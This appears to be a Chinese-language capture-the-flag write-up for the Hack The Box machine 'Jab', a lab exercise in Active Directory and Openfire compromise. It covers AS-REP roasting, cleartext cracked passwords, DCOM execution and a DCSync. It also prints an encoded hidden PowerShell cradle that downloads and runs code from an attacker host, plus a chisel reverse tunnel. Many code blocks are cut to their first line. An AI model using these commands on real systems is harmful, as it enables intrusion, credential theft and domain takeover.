HTB-M-Jab
HTB-Jab
扫描端口服务利用
XMPP - 5269, 5270(tcp
下载客户端
XMPP 是一个“通用消息标准”。它允许“XMPP 兼容的软件加入 XMPP 消息网络”
先创建,新建一个用户,使用,在利用插件Service Discovery 来进行那个信息收集
可以看到还有三个子域名
然后点击list的用户的查找用户这,顺便开启插件控制台
1 | <iq type='set' |
然后会列出所有查询,之后写脚本提取
1 | import re |
成为字典后开始检查
不需要预身份验证的账户
1 | impacket-GetNPUsers jab.htb/ -dc-ip dc01.jab.htb -usersfile 3.txt -outputfile 4.txt -format hashcat |
然后john一下
枚举的时候获得
1 | netexec smb jab.htb -u jmontgomery -p 'Midnight_121' |
然后用新凭证收集信息
下边有hash,结尾是密码
1 | netexec smb jab.htb -u svc_openfire -p '!@#$%^&*(1qazxsw' |
winrm不好使
利用凭证bloodhound
ExecuteDCOM
测试
开启监听
1 | tcpdump -ni tun0 icmp |
- -n
- 不进行主机名/IP 的反解析(提高速度,直接显示 IP 地址)
- -i tun0
- 指定网卡
发包
1 | impacket-dcomexec jab.htb/svc_openfire:'!@#$%^&*(1qazxsw'@10.10.11.4 'ping 10.10.16.14' -silentcommand -object MMC20 |
利用
1 | use exploit/multi/script/web_delivery |
然后生成的码放在
1 | impacket-dcomexec jab.htb/svc_openfire:'!@#$%^&*(1qazxsw'@10.10.11.4 'powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJAB2ADYAbwBRAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwBpAGYAKABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBQAHIAbwB4AHkAXQA6ADoARwBlAHQARABlAGYAYQB1AGwAdABQAHIAbwB4AHkAKAApAC4AYQBkAGQAcgBlAHMAcwAgAC0AbgBlACAAJABuAHUAbABsACkAewAkAHYANgBvAFEALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsAJAB2ADYAbwBRAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA2AC4AMQA0ADoAOAAwADgAMQAvAGgAcABpAGIAawBqAGEAcQBSAC8AaAB6AFkATQBRAEUAJwApACkAOwBJAEUAWAAgACgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANgAuADEANAA6ADgAMAA4ADEALwBoAHAAaQBiAGsAagBhAHEAUgAnACkAKQA7AA==' -silentcommand -object MMC20 |
1 | lsadump::dcsync /domain:jab.local /user:Administrator |
提权
查看进程
查看端口
1 | ./chisel_1.10.1_windows_amd64 client 10.10.16.14:8050 R:9090:127.0.0.1:9090 R:9091:127.0.0.1:9091 |
拿管理员身份登录账户
上传恶意插件
在“服务器” –> “服务器设置”中现在有一个“管理工具”选项:
我将按照 GitHub 上的说明输入“123”。该插件有一个选项下拉菜单:
Openfire - 7070, 7443 (tcp)
参考
All articles on this blog are licensed under CC BY-NC-SA 4.0 unless otherwise stated.
Comments